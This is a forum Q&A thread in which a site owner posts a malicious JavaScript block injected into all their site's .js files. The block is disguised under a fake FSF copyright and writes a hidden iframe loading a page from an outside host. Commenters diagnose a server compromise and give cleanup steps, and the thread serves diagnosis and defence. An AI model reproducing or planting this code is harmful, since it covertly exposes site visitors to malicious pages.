# Unknown javascript files edit

Tags: javascript, virus

All my .js files from my website have been edited without my knowledge, adding this block of code:

```
/*
Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
*/
function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\
[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}
function ActerMoto(){var e=navigator.userAgent;var 
t=e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 
6.2")>-1||e.indexOf("WindowsNT 6.3")>-1||e.indexOf("Windows")<+1;var 
n=getCookie("lusikrators")===undefined;if(!t&&n){document.write('<iframe 
src="http://fluersutel.mymessenger.com.ar/afloriut16.html" style="left: -904px;border-left-style: 
dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 
100px;position: absolute;border-right-width: 8px;top: -904px;"></iframe>');var r=new Date((new 
Date).getTime()+64*60*60*1e3);document.cookie="lusikrators=1; path=/; 
expires="+r.toUTCString()}}ActerMoto()
```

Have you guys seen this before? How the hell is this happening?

Comment: My guess would be that your IDE has been configured to do this.

Comment: What has actually changed? `fluersutel.mymessenger.com.ar` isn't yours? Some minifier running?

Comment: I've ruled out being my machine, as i removed the code from another machine using notepad. fluersutel.mymessenger.com.ar <- I have no idea what this is. Plus, hidden somewhere in php, something is pulling a http://mc.yandex.ru/metrika/watch.js . Fortunately, it's unreachable

Comment: Your server has been compromised. Take it offline. Scan your workstation for malware. Change your passwords. Build a clean server. Make sure you have applied the latest security updates. Restore the site's data from a backup.

Comment: http://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server

Comment: Well.. I guess i'll put on my investigator hat and dim the lights. I'm working on a new company and need to investigate who has access to the server. Thank you for the guidelines.

Answer (score -1):

I had something similar before. It was definitively not edited by me and my provider sent me a mail about that file, having a JavaScript malware.

But mine was quite more cryptic than yours ... and since some results on the web have a copyright before and after the JavaScript, I guess, too, that it's some program having added it.

Here is something else I found using Google:

- http://www.webdeveloper.com/forum/showthread.php?300697-Big-Problem (having no reply)
- https://forum.jquery.com/topic/big-problem-14-9-2014 (one reply)

A quote from the jQuery forum:

> minimized malware make for many problems.  It looks like it will
>   present an iframe sometimes.
>
> Revert to your backups.

Just a wild guess: Are you, or anybody else, you know of, using any software provided by http://www.fsf.org/ - The Free Software Foundation?

Comment: Please add a comment. Why do I get a -1 for that? What should I've done better?

Comment: Because this isn't an answer, this is a "me, too."